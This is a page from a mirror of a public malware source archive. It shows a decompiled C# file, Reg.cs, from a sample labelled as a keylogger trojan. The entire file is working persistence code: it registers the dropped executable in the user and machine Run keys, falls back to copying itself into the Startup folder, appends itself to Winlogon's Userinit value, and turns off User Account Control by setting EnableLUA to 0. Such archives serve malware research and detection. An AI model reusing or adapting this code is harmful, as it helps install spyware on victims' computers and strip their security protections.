daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-22 02:39:25 +00:00
Code Issues Projects Releases Wiki Activity
Files
e2d9bb12d0c263069e4957360091ad50e8781e00
MalwareSourceCode/MSIL/HEUR-Trojan-Spy/MSIL/K/HEUR-Trojan-Spy.MSIL.KeyLogger.cxy-16ef54e05f60ffe8b7333259df765d3431fb83555b6fc9170539714b4f83cb9c/Reg.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

97 lines
3.4 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: sTUB3.Reg
// Assembly: sTUB3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A48CA51E-DD48-4A82-AD76-B7119655ACE2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\HEUR-Trojan-Spy.MSIL.KeyLogger.cxy-16ef54e05f60ffe8b7333259df765d3431fb83555b6fc9170539714b4f83cb9c.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace sTUB3
{
public class Reg
{
[DebuggerNonUserCode]
public Reg()
{
}
public static void CheckReg(string TargetExeName, string TargetRegistryName)
{
string Right = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\system\\" + TargetExeName;
string str1 = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + TargetExeName;
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey.GetValue(TargetRegistryName) == null)
registryKey.SetValue(TargetRegistryName, (object) Right);
else if (Operators.CompareString((string) registryKey.GetValue(TargetRegistryName), Right, false) != 0)
{
registryKey.DeleteValue(TargetRegistryName);
registryKey.SetValue(TargetRegistryName, (object) Right);
}
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
if (!File.Exists(str1))
{
try
{
File.Copy(Process.GetCurrentProcess().MainModule.FileName, str1);
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
ProjectData.ClearProjectError();
}
}
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey.GetValue(TargetRegistryName) == null)
registryKey.SetValue(TargetRegistryName, (object) Right);
else if (Operators.CompareString((string) registryKey.GetValue(TargetRegistryName), Right, false) != 0)
{
registryKey.DeleteValue(TargetRegistryName);
registryKey.SetValue(TargetRegistryName, (object) Right);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true);
string str2 = registryKey.GetValue("Userinit").ToString();
if (!str2.Contains(Right))
registryKey.SetValue("Userinit", (object) (str2 + Right + ","));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true);
if (Operators.CompareString(registryKey.GetValue("EnableLUA").ToString(), "1", false) != 0)
return;
registryKey.SetValue("EnableLUA", (object) "0");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink